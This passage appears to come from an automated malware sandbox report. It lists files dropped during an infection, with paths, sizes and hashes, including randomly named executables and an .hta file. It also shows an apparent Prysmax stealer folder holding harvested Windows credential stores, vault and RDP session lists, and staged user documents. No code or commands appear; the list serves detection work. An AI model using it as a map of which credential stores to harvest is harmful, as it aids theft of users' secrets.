                                                                                                                                                              e95c9ef59f20d63e9b38f29931b04861dc65e3c2

                                                                                                                                                              SHA256

                                                                                                                                                              e3c7a598af09c98c321648699bac8d1019c48415dc10f0c3f06736fd044525ee

                                                                                                                                                              SHA512

                                                                                                                                                              39edb8eb9cba69a532e6b811ddecd5d3457107f626da711b7e45fc770fd06a3e44d05a927c6f9797a8e8777e60cf8ecbd22506053deb79b273cd455e8e6d8b4a

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3xhpu52e.default-release\activity-stream.discovery_stream.json

                                                                                                                                                              Filesize

                                                                                                                                                              27KB

                                                                                                                                                              MD5

                                                                                                                                                              fdbac390b65479e1615ba3c2ae31e008

                                                                                                                                                              SHA1

                                                                                                                                                              f851dafafda397151d6d9b0c8f1015ac43e45209

                                                                                                                                                              SHA256

                                                                                                                                                              62bf57b983caff9c01c0b6391063215fbbfc3fa80ce28c3e6fb338b21aa0e68f

                                                                                                                                                              SHA512

                                                                                                                                                              b814deb0cc1437cf3b5d3ec25333acad74af423b722148563f8c98c048faa96c26c79715343d9962d8bdbf33b911958a4b512177d752cdc4ef0149b4bd1a06ed

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3xhpu52e.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9

                                                                                                                                                              Filesize

                                                                                                                                                              13KB

                                                                                                                                                              MD5

                                                                                                                                                              2d639ebadb8b8044ec7e3581dcf8f7d4

                                                                                                                                                              SHA1

                                                                                                                                                              f567cc274bab2b8fd85081ebbc65167aecff2c5a

                                                                                                                                                              SHA256

                                                                                                                                                              5ec5956ab18bffbc24ff7ee42238ff71781787d9593a9f7b6bce79943e5f0e16

                                                                                                                                                              SHA512

                                                                                                                                                              55410ca82da78334e4c85d5cd160d167632f95602e45a5a86ab6fc073eeb4c88000a947a445a223235fbdacd9bd883c383314b1a8740571597982d20375ce8eb

                                                                                                                                                            • C:\Users\Admin\AppData\Local\TempLTVJ6RNAZJJK9IDN9EGQLENDRCAKQ4V4.EXE

                                                                                                                                                              Filesize

                                                                                                                                                              1.8MB

                                                                                                                                                              MD5

                                                                                                                                                              a752fde56138218f3e1a1f44ac484dcd

                                                                                                                                                              SHA1

                                                                                                                                                              199950392575a864c33512e87d1128bd3c77a018

                                                                                                                                                              SHA256

                                                                                                                                                              a844b09082f62f12aa5acbe8fbb0bf8df3b2830e3dc35a37fcca55fd14257339

                                                                                                                                                              SHA512

                                                                                                                                                              e76ed918fe9c506b3175a8149d708c694acef095b2897f7f7dbb096df9228c2376c03cb34f82127bfc38a1b78c2689cd00be4d1631e609acc3dc667e6fbf1be7

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\00mhoVEOG.hta

                                                                                                                                                              Filesize

                                                                                                                                                              717B

                                                                                                                                                              MD5

                                                                                                                                                              104b9ae65509c794e356eb6a2337b1d3

                                                                                                                                                              SHA1

                                                                                                                                                              6b82eb57295a5a3f350a2509b609cc79c964af89

                                                                                                                                                              SHA256

                                                                                                                                                              634546a7f94f2da8ac7f343cbf3cb0241886a8e9f82e5484cb40156b7d673f6e

                                                                                                                                                              SHA512

                                                                                                                                                              25117c2d4322f1c02e52bbf2d2480fc2243a3b1b410374a5244fb91c4cbc71e5f99864b0a8e4ab97148229c7d24f08aea4ca882db78bc97f1da2e0322c2f7a08

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.9MB

                                                                                                                                                              MD5

                                                                                                                                                              e8acc9271d065ecd9b752568c7b0a9ea

                                                                                                                                                              SHA1

                                                                                                                                                              6a270b60ae8e6c1c125882d035f765fb57291c6a

                                                                                                                                                              SHA256

                                                                                                                                                              f07748fe482e9ddb045c6aaae08df35addab33a63e2cdff3ea6ec78b89cd5865

                                                                                                                                                              SHA512

                                                                                                                                                              a18c2dab0872d36df19f292857797fd9b3e56b92916ce494cdd41833ed50896bdae036d500fb47dd6cca7d4a970f29e6c03646798cf6192cc648eb63d1af090a

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.9MB

                                                                                                                                                              MD5

                                                                                                                                                              f88e81846f7e7666edb9f04c933fd426

                                                                                                                                                              SHA1

                                                                                                                                                              80dae46a3c2c517b4c1b5d95228b0d5dcfa65359

                                                                                                                                                              SHA256

                                                                                                                                                              c8cb3ae4287b10d16c5557b47a6ad9220f097f5449da1c4e575a8194219806d3

                                                                                                                                                              SHA512

                                                                                                                                                              c86b57f648069d31f2ef3bfddc5cb9f36698e113d52966f4b060c5f0212c5a87331d34ca32f04ea5655d79e8e7e7c17f763ac70b07b0558fb87ff8ef54861c5a

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.9MB

                                                                                                                                                              MD5

                                                                                                                                                              9003b6e0e08af8e7e533d8ba71822444

                                                                                                                                                              SHA1

                                                                                                                                                              e8943dd173e62cddfd01c46700f248405ab70577

                                                                                                                                                              SHA256

                                                                                                                                                              f16b6517bfc4e9f4f110bee618184b8a4089a9b9bf662c8735da0bb13391999e

                                                                                                                                                              SHA512

                                                                                                                                                              9da40ba0a90529617d77038507a8c0d8373118d69601d5b15a234dfc7f9eb2be45b121792e4dd108fdf8d366d9af237eccc9f5d24edc610f544cecf6c9921449

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.9MB

                                                                                                                                                              MD5

                                                                                                                                                              d59871d68dc69ee99a5cebbd0e4afdf6

                                                                                                                                                              SHA1

                                                                                                                                                              4096ad689f13f6f9662959c8a2fd11638133f259

                                                                                                                                                              SHA256

                                                                                                                                                              3eea14ed7211404b87b48024fcc56fb713b20dde9aa07c90fe4eebce7a16c7e5

                                                                                                                                                              SHA512

                                                                                                                                                              6a5e7936918d3db4ff89f6381540d60162e714f9be86c1f45f2bc92d13e9c6703eaeff48ab182b4e00f378e64732b57a83f850e775abf7aeba357a61bad3d2fc

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd

                                                                                                                                                              Filesize

                                                                                                                                                              1.4MB

                                                                                                                                                              MD5

                                                                                                                                                              2f0f5fb7efce1c965ff89e19a9625d60

                                                                                                                                                              SHA1

                                                                                                                                                              622ff9fe44be78dc07f92160d1341abb8d251ca6

                                                                                                                                                              SHA256

                                                                                                                                                              426b6e77a4d2e72edf8cd6177578a732ca05510b56cb58d938d6e25820dc2458

                                                                                                                                                              SHA512

                                                                                                                                                              b8587d32e98693f08c9c3776ac4168204d76dd6db0d76c6afc815d6727d745f6137ae83fe85a7562517b37c320ddebc27167a9f3f14dacca33954dbe437dc920

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe

                                                                                                                                                              Filesize

                                                                                                                                                              5.3MB

                                                                                                                                                              MD5

                                                                                                                                                              3528bab3defbb275613071b56b382dc6

                                                                                                                                                              SHA1

                                                                                                                                                              9aa148b7ca064be140faa2e08cfe6b58c2a3a8cd

                                                                                                                                                              SHA256

                                                                                                                                                              45ca5d028b1bb143d818a5c15b9c09156cf0cbb67412600a415212a8a7c9553c

                                                                                                                                                              SHA512

                                                                                                                                                              8cdbad6ca0347d2ac417b5fdea159b838a9b47f22e145c4b5f9a46eedca48f212820726c608752fed9de8256773910a0e3310f386ab25fea4f1f872c4ef249b9

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe

                                                                                                                                                              Filesize

                                                                                                                                                              327KB

                                                                                                                                                              MD5

                                                                                                                                                              fda2e2ddccb519a2c1fb72dcaee2de6f

                                                                                                                                                              SHA1

                                                                                                                                                              efd50828acc3e182aa283c5760278c0da1f428a6

                                                                                                                                                              SHA256

                                                                                                                                                              cf70392e26ee7d6d24cb39499567052935664d37a1b49572f9d0b5f3f3189f57

                                                                                                                                                              SHA512

                                                                                                                                                              28c79ed9a9d5db3920b7e942c66670eec02046fa3d751ad18e9b3597caab76645b194bfa18bb5925ecfb8d201a291a44ee427ef39632f673db39edc43111c3cf

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413340101\14b9f620be.exe

                                                                                                                                                              Filesize

                                                                                                                                                              320KB

                                                                                                                                                              MD5

                                                                                                                                                              b66a7b01639001b840bf4b8a98268180

                                                                                                                                                              SHA1

                                                                                                                                                              4481e73621d01de9122ee197fd3ce38c17a92364

                                                                                                                                                              SHA256

                                                                                                                                                              b453bafdc212ccea21680e81044598bfbd99d3bdfad8fe119a13f01b23ad3966

                                                                                                                                                              SHA512

                                                                                                                                                              5acfb0a09368ee07c576b68a883f141a46f9aaf17929e30dca9854e51c58a34e0eb5a87dccee70b3171906bfbfb6d30d114b19f36a0079612f85873b7301c800

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413350101\93a8c2a642.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.2MB

                                                                                                                                                              MD5

                                                                                                                                                              f9bcaae61a579c39d61e3be051d8e32e

                                                                                                                                                              SHA1

                                                                                                                                                              bd481b1151a304d5e21609a9455f6dc6a1c884ab

                                                                                                                                                              SHA256

                                                                                                                                                              52dd8310c2a3c499edfe6be307c8785034eec46c2754376114065339bba063ee

                                                                                                                                                              SHA512

                                                                                                                                                              44ffc5d70493fae2458fc06e306fc003bc6bc8b6bb7922f7d5018f869672eb82ea9606a680148af39ce13557505615d44262e509597444e258596f5db498d849

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413350101\93a8c2a642.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.3MB

                                                                                                                                                              MD5

                                                                                                                                                              819c8524a7687f743b5e739fc168a5c7

                                                                                                                                                              SHA1

                                                                                                                                                              8ab39b11b510d0b8f4d736fa84a00b13eb0945c5

                                                                                                                                                              SHA256

                                                                                                                                                              5f11b47b6323ce08678bdeadca880be9154e94e71013163b0f2dc620068421ad

                                                                                                                                                              SHA512

                                                                                                                                                              6e06fc66f6760a8d427d126c37944184499bccd7ab90b1c9077e28e82717323fbf688b7159e9d819554d1cdb7ca62a8f3e472cd0c12ea2fe0d4c7494cbbc456c

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413350101\93a8c2a642.exe

                                                                                                                                                              Filesize

                                                                                                                                                              4.4MB

                                                                                                                                                              MD5

                                                                                                                                                              9cc4bb0a1a21365a640f91896a70167c

                                                                                                                                                              SHA1

                                                                                                                                                              fea8579e98f6c06c1d9fbb451c48f29886afa0c7

                                                                                                                                                              SHA256

                                                                                                                                                              5c10a724fc0d2918f0fb75f934376ed02b24a54013820d45f31c0699f232cf9f

                                                                                                                                                              SHA512

                                                                                                                                                              e923d45771c1b32022ab2b80fe270fa550fe25dfcb0d430e10605c2990c201df399777ac5ade286c7c67194ec4799ac7f8daf4e568b34b0be06c85cf39eafa61

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413360101\08ea25dad9.exe

                                                                                                                                                              Filesize

                                                                                                                                                              4.4MB

                                                                                                                                                              MD5

                                                                                                                                                              514ef35b4134d7761e5c5b657d7a01d9

                                                                                                                                                              SHA1

                                                                                                                                                              9810c95e43be649f5ef76d7447851e78e987f3b3

                                                                                                                                                              SHA256

                                                                                                                                                              51c382a906cb0b91642f302ed21dc74333026ac97027c704e82d23351a5a807a

                                                                                                                                                              SHA512

                                                                                                                                                              a838a21105591bd5a7fc20763020c794917d4239fede6a4cd6ee908130e8e3da94bdc6560e4af877e89480991abe70bb7eed3389620e1caf03955b4d9365be6a

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413370101\2bab32b808.exe

                                                                                                                                                              Filesize

                                                                                                                                                              2.0MB

                                                                                                                                                              MD5

                                                                                                                                                              311dafc7caa1981ac46344dc06086a1e

                                                                                                                                                              SHA1

                                                                                                                                                              5cda2a58ccd7ab1112a3445f7f11ad31d0195f3c

                                                                                                                                                              SHA256

                                                                                                                                                              60f931aa5fef6b83082dd0c66331100ef9ecf90dc517d4fae256df08e49043c4

                                                                                                                                                              SHA512

                                                                                                                                                              2cada8a0b930da6769970c9471aab55025f5d8ce4ecd7fc15cc8f1771a5805d2bb7b3bef6d1af76de7053e37f25c5e67390ee7eab235c5f11e7af7083bf471d9

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413380101\2dde2eb10e.exe

                                                                                                                                                              Filesize

                                                                                                                                                              2.3MB

                                                                                                                                                              MD5

                                                                                                                                                              9a70ef56437f86c6125e996f53233406

                                                                                                                                                              SHA1

                                                                                                                                                              08eaad5730c98e8624c43e889a1b5dd13a4e9c70

                                                                                                                                                              SHA256

                                                                                                                                                              9720bd9aaaae46a1be33aea14f49847d48517f74dae7a7c118fe593108075d28

                                                                                                                                                              SHA512

                                                                                                                                                              4eaaf4f957323b3be4d6686ff53650556c4349369166a3e4ab576c2eb5309e97ad954ec0970965e585894725906f8722960dcbd3eadb3c821b04272f8f523ce1

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413390101\cf814bf0a7.exe

                                                                                                                                                              Filesize

                                                                                                                                                              947KB

                                                                                                                                                              MD5

                                                                                                                                                              be9266b6d07dd5c9f071eed4f55f92ea

                                                                                                                                                              SHA1

                                                                                                                                                              9adad306a6b0a670bea67fae4d8f4f078f95735d

                                                                                                                                                              SHA256

                                                                                                                                                              2ad49aaca12035440c43ac4dc0642b0cdbf99d98d94209626c101ab488341b1f

                                                                                                                                                              SHA512

                                                                                                                                                              a22515ebd7f2078c9f2c318fb3352ed4bb52eb39000d171f5895985ffc68b89b549f5f3f53d7bb8fa4a82ed14032cea6e5f07660bd5bbb32fc444f79e714303c

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413400101\b474d33350.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.7MB

                                                                                                                                                              MD5

                                                                                                                                                              60c79710a31769fd938b87b6f2c714cb

                                                                                                                                                              SHA1

                                                                                                                                                              0982ef8bc755f3688115c6043325318e8ce174e0

                                                                                                                                                              SHA256

                                                                                                                                                              0d3e93bc1de27fb22a0e523c940c81d825cfe92688360b91c6fea5f587de1cb9

                                                                                                                                                              SHA512

                                                                                                                                                              6a425887119ed799a165edd16cefee6fc51221a7f6980c8d0eec916c0b0396aa77d16c81beb6227c60d57efb881bf1cc66bca34a578558d348e66a6fd66e5df4

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe

                                                                                                                                                              Filesize

                                                                                                                                                              354KB

                                                                                                                                                              MD5

                                                                                                                                                              27f0df9e1937b002dbd367826c7cfeaf

                                                                                                                                                              SHA1

                                                                                                                                                              7d66f804665b531746d1a94314b8f78343e3eb4f

                                                                                                                                                              SHA256

                                                                                                                                                              aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

                                                                                                                                                              SHA512

                                                                                                                                                              ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe

                                                                                                                                                              Filesize

                                                                                                                                                              1.2MB

                                                                                                                                                              MD5

                                                                                                                                                              a06b6ca8d9a307911573389aee28fc34

                                                                                                                                                              SHA1

                                                                                                                                                              1981c60d68715c6f55b02de840b091000085c056

                                                                                                                                                              SHA256

                                                                                                                                                              cce36fa950470b05beb043a273be6ddc93c55550d1e7ee1472cf807e2c87887c

                                                                                                                                                              SHA512

                                                                                                                                                              3a8fb1466bff7806dddc88764a5f02db18f77a32e2dd4de3168130a7b3c8c552f97f60766805b0050634d5100c190dbf56e1e3340c424f091c6299410c85fc89

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\261.exe

                                                                                                                                                              Filesize

                                                                                                                                                              88KB

                                                                                                                                                              MD5

                                                                                                                                                              89ccc29850f1881f860e9fd846865cad

                                                                                                                                                              SHA1

                                                                                                                                                              d781641be093f1ea8e3a44de0e8bcc60f3da27d0

                                                                                                                                                              SHA256

                                                                                                                                                              4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

                                                                                                                                                              SHA512

                                                                                                                                                              0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\FF30.tmp\FF31.tmp\FF32.bat

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              e5ddb7a24424818e3b38821cc50ee6fd

                                                                                                                                                              SHA1

                                                                                                                                                              97931d19f71b62b3c8a2b104886a9f1437e84c48

                                                                                                                                                              SHA256

                                                                                                                                                              4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

                                                                                                                                                              SHA512

                                                                                                                                                              450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax.zip

                                                                                                                                                              Filesize

                                                                                                                                                              6.2MB

                                                                                                                                                              MD5

                                                                                                                                                              669124cdca4c1fa7104a5cf9aeb0e50f

                                                                                                                                                              SHA1

                                                                                                                                                              8d79d76fa5687ef024e4544bcafb7a521e782f8b

                                                                                                                                                              SHA256

                                                                                                                                                              c3ebfaec2df96efd011935c8409460574685e131be4daad4ce7ff0e0e5421179

                                                                                                                                                              SHA512

                                                                                                                                                              1907e67871b2a8caaa9d9694c4791b52044797d2e7f8b8594b9e94d2fe1b091099f4029bee4e3f5fa556a98bdc14de689aeec2a3b09af65db32dda5fabddbb05

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\CREDHIST

                                                                                                                                                              Filesize

                                                                                                                                                              24B

                                                                                                                                                              MD5

                                                                                                                                                              4bad2c43840c147eca664da82c63e6b4

                                                                                                                                                              SHA1

                                                                                                                                                              f83f354dcdcff0969ca620aa1ac3d829aa857b36

                                                                                                                                                              SHA256

                                                                                                                                                              9eb48542a7b86e024183c276e8479ff53680ac6cd1f93c4e03dd933dc8c5d056

                                                                                                                                                              SHA512

                                                                                                                                                              250cebb0ec5ee388728356ae1b3f8ebc3dbc0b575cb7cb03de46dfdbb506f1f8c13ced55537a81d27bd017a8f5c64e058bba33bd16f8d73fcc4c68920f65a292

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\S-1-5-21-308834014-1004923324-1191300197-1000\Preferred

                                                                                                                                                              Filesize

                                                                                                                                                              24B

                                                                                                                                                              MD5

                                                                                                                                                              1732f9f6bf7e50db7e0d990402dfb001

                                                                                                                                                              SHA1

                                                                                                                                                              a44178a1ebdef70585666f41169360678308a9fe

                                                                                                                                                              SHA256

                                                                                                                                                              b682c3fa5d0add9c6d38549dd9b8be4f67a835dda1b5bfaa707bd58fbc93fcc7

                                                                                                                                                              SHA512

                                                                                                                                                              9b506b2a59a9afbb551e22c3d6fc704698464f589e4df4ee149c650c59d3894a216389d6e1307768aca9c7a6e7ada3b1220c2b472735ca368b345a1420951039

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\S-1-5-21-308834014-1004923324-1191300197-1000\b5e08bdc-d664-4573-b0cf-c025d45f55ed

                                                                                                                                                              Filesize

                                                                                                                                                              468B

                                                                                                                                                              MD5

                                                                                                                                                              d162ae37aef523fee1f9447e49f4c98b

                                                                                                                                                              SHA1

                                                                                                                                                              074b713e752d021aa5349845b0cff36d4e9dc889

                                                                                                                                                              SHA256

                                                                                                                                                              757a5639babd2cc3241f9649abc4264c086ae34059bf78ce27ac0acddad57c22

                                                                                                                                                              SHA512

                                                                                                                                                              b275af5214f36a60f227d99f17d1926866a46c22e788be2ee1d4ac84e890d0e87b5aadf541f8ded4f119519f3fbbfa49e24db1c0c224b9b5cdcd5b96a50485e0

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_2\DFBE70A7E5CC19A398EBF1B96859CE5D

                                                                                                                                                              Filesize

                                                                                                                                                              10KB

                                                                                                                                                              MD5

                                                                                                                                                              fb9bc47c99c257b40cbd0ea9ba27b4e1

                                                                                                                                                              SHA1

                                                                                                                                                              544537b0b0805d3fb2ecc097580bd8ea47ad642b

                                                                                                                                                              SHA256

                                                                                                                                                              7004b7405fc5a56f02ca177aec629f9326b3179d40502a86d4f16c557cd085ac

                                                                                                                                                              SHA512

                                                                                                                                                              0e5f956c2ebef819ea2c3998958c0c579ca4e25bdd76f8e60864b35906084336d74a1564294604c11bf6cfd49b3dcad43e50ba346b1a720f8e780af453434bea

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\RDP_Sessions.txt

                                                                                                                                                              Filesize

                                                                                                                                                              499B

                                                                                                                                                              MD5

                                                                                                                                                              13ad7335611fcfb88efa3590a11f2212

                                                                                                                                                              SHA1

                                                                                                                                                              ae8de55bb91229e0e3e082697c2ffa877340c437

                                                                                                                                                              SHA256

                                                                                                                                                              1f93e1567b7b8ddcf5db5ea670eecf1ce717ce72346bb28c131be218f25bf8ed

                                                                                                                                                              SHA512

                                                                                                                                                              14e5393c6ad833c222d9f883006891190ce5811d484be079b820beb10fda99a8b0ec9c2470a091c8f0b118f5319b5425517849a50e72ed3c753beeba0132dc82

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\cmdkey_list.txt

                                                                                                                                                              Filesize

                                                                                                                                                              310B

                                                                                                                                                              MD5

                                                                                                                                                              8767fce9a467be7e2160ad35ecc9328d

                                                                                                                                                              SHA1

                                                                                                                                                              67efc39fd52ab69cb62fbff6411b9f23d0b03ebc

                                                                                                                                                              SHA256

                                                                                                                                                              b34d967f06c3a545baaae7811c147f46c1fd3f994c31351cb9178d300a85d527

                                                                                                                                                              SHA512

                                                                                                                                                              f49723c013b75ba1b4ad91a4930b5dc8b98d8961f4fb190bb4a49fccdb827d832c9548835178a8ec73767c4ca5517df773e7a74e17b9d0d8f5288536957b8afd

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\windows_vault.txt

                                                                                                                                                              Filesize

                                                                                                                                                              336B

                                                                                                                                                              MD5

                                                                                                                                                              da510ee1496286415109f3ec58d6123c

                                                                                                                                                              SHA1

                                                                                                                                                              8886a1786606d8f5d693a6e87fef39054bd022af

                                                                                                                                                              SHA256

                                                                                                                                                              82c3ed7cb28a633ba026353c6349e8305423e5e1202f8c6030ec1b8706932e73

                                                                                                                                                              SHA512

                                                                                                                                                              f2b5b6e278e6a91e92d0dc296e7837c3d486505a23fe3f574a5c56735a369e30c06942a2695f09a110884d7988b512f02d9a599b82b6abe9bdb3f0e8d8286b77

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\ConnectedDevicesPlatform__connected devices platform certificates.sst

                                                                                                                                                              Filesize

                                                                                                                                                              655B

                                                                                                                                                              MD5

                                                                                                                                                              2dcde0a84cb6637a7a6e8d41bbc6944e

                                                                                                                                                              SHA1

                                                                                                                                                              f8811ef7f3b2c4a1fc7ed2feee96952a4af28e14

                                                                                                                                                              SHA256

                                                                                                                                                              b0335670f8bda96a251940f0cd15dc3c8699f44c9c942ad703e00f65f6a8efa4

                                                                                                                                                              SHA512

                                                                                                                                                              c007d17023208edb0ba59d02281d4991c10996b4056db201b200175ed66a37cccdf3e0e24eb5087153aebaa5a42645506f486b4dd9ce7e3ebf85b0568962eb00

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Documents__connectuse.vsdx

                                                                                                                                                              Filesize

                                                                                                                                                              858KB

                                                                                                                                                              MD5

                                                                                                                                                              ffded7e4b2638617c13ad5756592e4ba

                                                                                                                                                              SHA1

                                                                                                                                                              0646da6fa9cc4ba288740fdf146406d5f0ddc7aa

                                                                                                                                                              SHA256

                                                                                                                                                              ce3d8bf4273d01f0f400d64f20ea30c39e34e2df57e215f785c8dec47382a102

                                                                                                                                                              SHA512

                                                                                                                                                              2520ba5f1282a6948c3b123784f913ab6914d9f7d7160d69d99350fb6fc7f351302c92b3348e8e68283cd2956f80a62e22af4b0df93c92ae35b38851e330a373

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Documents__disconnectmount.xltm

                                                                                                                                                              Filesize

                                                                                                                                                              1022KB

                                                                                                                                                              MD5

                                                                                                                                                              82259f7abef2353a46d52fb62dbcdb03

                                                                                                                                                              SHA1

                                                                                                                                                              4151687e3d21d2204455ce2fce0079fe65c512bb

                                                                                                                                                              SHA256

                                                                                                                                                              6f360232fd1d0e5b5f4fbb51591b5c42a4351f0ef7dc1bb0f508739a031f5320

                                                                                                                                                              SHA512

                                                                                                                                                              6fe45defc41b95840bbc76b3ab0a5a011ff30522ec59f7c2987497002b9b5a9bdd73a6aa95b10f5d2419f2a50aaa8f14df638fe272751407b5243ef6c3b6c9a9

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Documents__installdisconnect.xlsb

                                                                                                                                                              Filesize

                                                                                                                                                              490KB

                                                                                                                                                              MD5

                                                                                                                                                              a6000030f48380c57f721f0dc8827749

                                                                                                                                                              SHA1

                                                                                                                                                              28cbd548180c1f040d67f0c4d39835688497efa1

                                                                                                                                                              SHA256

                                                                                                                                                              53c5f7224578fff523f1ae45942872fd1b45264e8c9a0dd7a55136e8801b3ada

                                                                                                                                                              SHA512

                                                                                                                                                              c94f355c602fc6ddaac54ad74aa4ee937ac0968f52ea7551a22f87a24470a2e9cf419645de2a34acd5758c7203c2bd50c6575c263b9d1ee266f089eff53b81ca

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Downloads__copydisconnect.vsd

                                                                                                                                                              Filesize

                                                                                                                                                              568KB

                                                                                                                                                              MD5

                                                                                                                                                              f54043e01e488c1a8501c62b8137699b

                                                                                                                                                              SHA1

                                                                                                                                                              36be3ee9e56d304a73658281a37d35a1c60c1454

                                                                                                                                                              SHA256

                                                                                                                                                              e4c23ec0c88ec55b5a34c5e2c0ac7aa545a3dd8aebc5e6dae20f1e61b17654b6

                                                                                                                                                              SHA512

                                                                                                                                                              0f83f7b53d17352699ae8464a8af81ca4288a4287416500229fc25a5865104b0046bbfbf732a495826e830ea114ed67ac947aeb95424db26cc7388860ea2d32c

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Downloads__expandconnect.lock

                                                                                                                                                              Filesize

                                                                                                                                                              448KB

                                                                                                                                                              MD5

                                                                                                                                                              18241064926cd3a1568696405597b7aa

                                                                                                                                                              SHA1

                                                                                                                                                              4bc292d8be360933b7ff0a5772e5d83093629e5d

                                                                                                                                                              SHA256

                                                                                                                                                              0f931f1a598b4fbb91bbebc603d282c8cb459221b146603b450e44a3d98ac0b2

                                                                                                                                                              SHA512

                                                                                                                                                              64d87fb7fa1673eaa606da8324205de83aabb6f5b811414bd84dcfc33f3d63257058e0c068a01be4bf8f43a05d81cf15da8c80ea699d01986a52d755ef499cbd

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Downloads__registerconnect.gif

                                                                                                                                                              Filesize

                                                                                                                                                              400KB

                                                                                                                                                              MD5

                                                                                                                                                              a96a7e7dcb94cf4863f6ddaec90ccbea

                                                                                                                                                              SHA1

                                                                                                                                                              4221b3a2bc1032251a6a7b53b783acc7bbd5145b

                                                                                                                                                              SHA256

                                                                                                                                                              81457ad6b4e7e54d582658c48ece23b99c080963c5618063a18c9cc2bd930afa

                                                                                                                                                              SHA512

                                                                                                                                                              87e67d4ba2e3441580c357e0a7b7f27999913223da8ba0e66d1120baa8932a0afda118078e041339e888e26bd5c42f5cde07df869dd9aea4d02bf89e97a3f4d2

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Downloads__suspendconnect.xlsb

                                                                                                                                                              Filesize

                                                                                                                                                              365KB

                                                                                                                                                              MD5

                                                                                                                                                              a9eef6290ba428baf87bdc1699e5a4a3

                                                                                                                                                              SHA1

                                                                                                                                                              a727948ffbb7a30f0bcf624b585ff6ace53d6b26

                                                                                                                                                              SHA256

                                                                                                                                                              c2f0aac9e350880371aad1206a669102162b54fc1b32ca79713b91c3dbd6717c

                                                                                                                                                              SHA512

                                                                                                                                                              819b956d09332fbfbb64d8932382c6b5c45b67477e714b3cf9284469b9aad08a325671e32e2005fe90f57a8fe62fdf3251fdb97cc509ee51996f878d91f3f057

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Music__connectconvertfrom.dvr

                                                                                                                                                              Filesize

                                                                                                                                                              927KB

                                                                                                                                                              MD5

                                                                                                                                                              68a45af1c68429fff6d3d15967489faf

                                                                                                                                                              SHA1

                                                                                                                                                              9f1fdb1edbb1a7ac38fe888f684097a928b5a710

                                                                                                                                                              SHA256

                                                                                                                                                              07353b11a7d6f47a267d1718d74e43eb626ba55d6dddd6e75174141f16b4af54

                                                                                                                                                              SHA512

